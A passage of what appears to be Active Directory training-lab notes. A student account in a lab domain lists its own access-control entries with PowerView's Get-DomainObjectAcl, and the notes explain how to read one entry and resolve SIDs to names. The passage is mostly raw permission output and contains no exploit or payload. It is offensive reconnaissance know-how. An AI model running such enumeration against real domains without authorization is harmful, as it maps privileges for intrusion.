InheritedObjectAceType : All
OpaqueLength : 0

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-548
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadControl
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 131072
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 131220
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 20
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-18
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 60
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-527
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Key-Credential-Link
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-526
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : Self
ObjectAceType : DS-Validated-Write-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-3-0
AccessMask : 8
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : Self
ObjectAceType : DS-Validated-Write-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 8
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Group
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-9
AccessMask : 16
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : WriteProperty
ObjectAceType : ms-TPM-Tpm-Information-For-Computer
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent, InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-10
AccessMask : 32
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Computer
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : inetOrgPerson
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : InheritOnly
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, InheritOnly, Inherited
InheritedObjectAceType : Group
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericRead
ObjectAceType : All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : InheritedObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 131220
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : User
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit, ObjectInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : True
AceFlags : ObjectInherit, ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty, ExtendedRight
ObjectAceType : Private-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 304
AuditFlags : None
IsInherited : True
AceFlags : ContainerInherit, Inherited
InheritedObjectAceType : All
OpaqueLength : 0

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 36
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-335606122-960912869-3279953914-519
AccessMask : 983551
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ListChildren
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-554
AccessMask : 4
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead,
WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed

How to read the output of Get-DomainObjectACL

From the output we use one ACE for the explanation.

AceType : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead,
WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed

On the ObjectDN i.e. on student163 the security identifier S-1-5-32-544 has ActiveDirectoryRights
(CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner) .

In order to convert the security identifier to a principal name, we have to use the following loop.
foreach {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_}

This loop will add a property 'IdentityName' to the output so that we can easily identify the security
identifier.
PS C:\Users\student163> Get-DomainObjectAcl -SamAccountName student163 -ResolveGUIDs | foreach
{$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : User-Change-Password
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-1-0
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Everyone

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Account-Restrictions
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : User-Logon
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Membership
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : RAS-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-553
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : X509-Cert
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-517
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName :

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Token-Groups-Global-And-Universal
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-560
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Windows Authorization Access Group

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Terminal Server License Servers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server-License-Server
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : BUILTIN\Terminal Server License Servers

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : Send-As
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : Receive-As
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : General-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Authenticated Users

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Public-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Authenticated Users

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Personal-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Authenticated Users

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty
ObjectAceType : Web-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-11
AccessMask : 16
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Authenticated Users

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Personal-Information
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-13603
InheritanceFlags : None
BinaryLength : 40
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-10
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : Principal Self

AceQualifier : AccessAllowed
ObjectDN : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
